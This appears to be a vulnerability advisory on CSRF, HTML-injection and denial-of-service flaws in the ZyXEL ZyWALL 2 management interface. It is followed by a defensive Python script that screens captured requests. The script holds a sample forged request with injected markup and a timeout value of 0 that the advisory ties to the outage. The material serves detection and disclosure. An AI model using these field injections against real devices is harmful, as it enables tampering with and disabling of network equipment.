Vendor: ZyWALL 2
By: Unknown
CVSS: 7.5 (HIGH)
Cross-Site Request Forgery, HTML Injection, Denial-of-Service
CWE: Unknown
Product Name: ZyWALL 2
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: h:zyxel:zywall_2
Platforms Tested: Unknown
ZyXEL ZyWALL 2 Multiple Remote Vulnerabilities
The ZyXEL ZyWALL 2 is prone to multiple remote vulnerabilities that affect the management interface. An attacker can exploit these issues to carry out cross-site request forgery, HTML-injection, and denial-of-service attacks. The exploit code provided demonstrates a cross-site request forgery attack that injects malicious HTML code into the 'sysSystemName' and 'sysDomainName' fields, potentially leading to HTML-injection attacks. Additionally, the exploit sets the 'StdioTimout' field to '0', causing a denial-of-service condition. The vulnerability is reported to affect ZyWALL 2 devices running firmware V3.62(WK.6).
Mitigation: No mitigation or remediation information provided
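
The request pattern described in the advisory can be screened for in captured management-interface traffic or at a filtering proxy in front of the device. The following is an added example, not code from the advisory or from ZyXEL; only the three field names come from the page, while the management address, the function name and the sample requests are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Field names come from the advisory; hosts and sample requests are constructed.
TEXT_FIELDS = ("sysSystemName", "sysDomainName")
TIMEOUT_FIELD = "StdioTimout"
MARKUP = re.compile("[<>\"']")

def screen_request(headers, body, device_hosts):
    """Return findings for one captured form POST to the management interface."""
    findings = []
    hdr = {k.lower(): v for k, v in headers.items()}
    # CSRF signal: the form was submitted by a page served from another host.
    source = hdr.get("origin") or hdr.get("referer")
    if source is None:
        findings.append("request source missing")
    elif urlsplit(source).netloc.lower() not in device_hosts:
        findings.append("cross-origin submit")
    form = parse_qs(body, keep_blank_values=True)  # also percent-decodes values
    # HTML-injection signal: markup characters in either name field.
    for name in TEXT_FIELDS:
        if any(MARKUP.search(v) for v in form.get(name, [])):
            findings.append("markup in " + name)
    # DoS signal: the advisory ties a value of 0 in this field to the outage.
    for value in form.get(TIMEOUT_FIELD, []):
        try:
            if int(value) == 0:
                findings.append(TIMEOUT_FIELD + " set to 0")
        except ValueError:
            findings.append(TIMEOUT_FIELD + " not numeric")
    return findings

DEVICE_HOSTS = {"192.168.1.1"}  # assumed management address
FORGED = ({"Referer": "http://other.example/page.html"},
          "sysSystemName=%3Cb%3Ex%3C%2Fb%3E&sysDomainName=lan.example&StdioTimout=0")
ROUTINE = ({"Origin": "http://192.168.1.1"},
           "sysSystemName=fw01&sysDomainName=lan.example&StdioTimout=5")

if __name__ == "__main__":
    for label, (headers, body) in (("forged", FORGED), ("routine", ROUTINE)):
        print(label, screen_request(headers, body, DEVICE_HOSTS))
```

A request that trips all three checks at once matches the combined behaviour the advisory attributes to the exploit; any single finding on its own is worth reviewing against the administrator's actual activity.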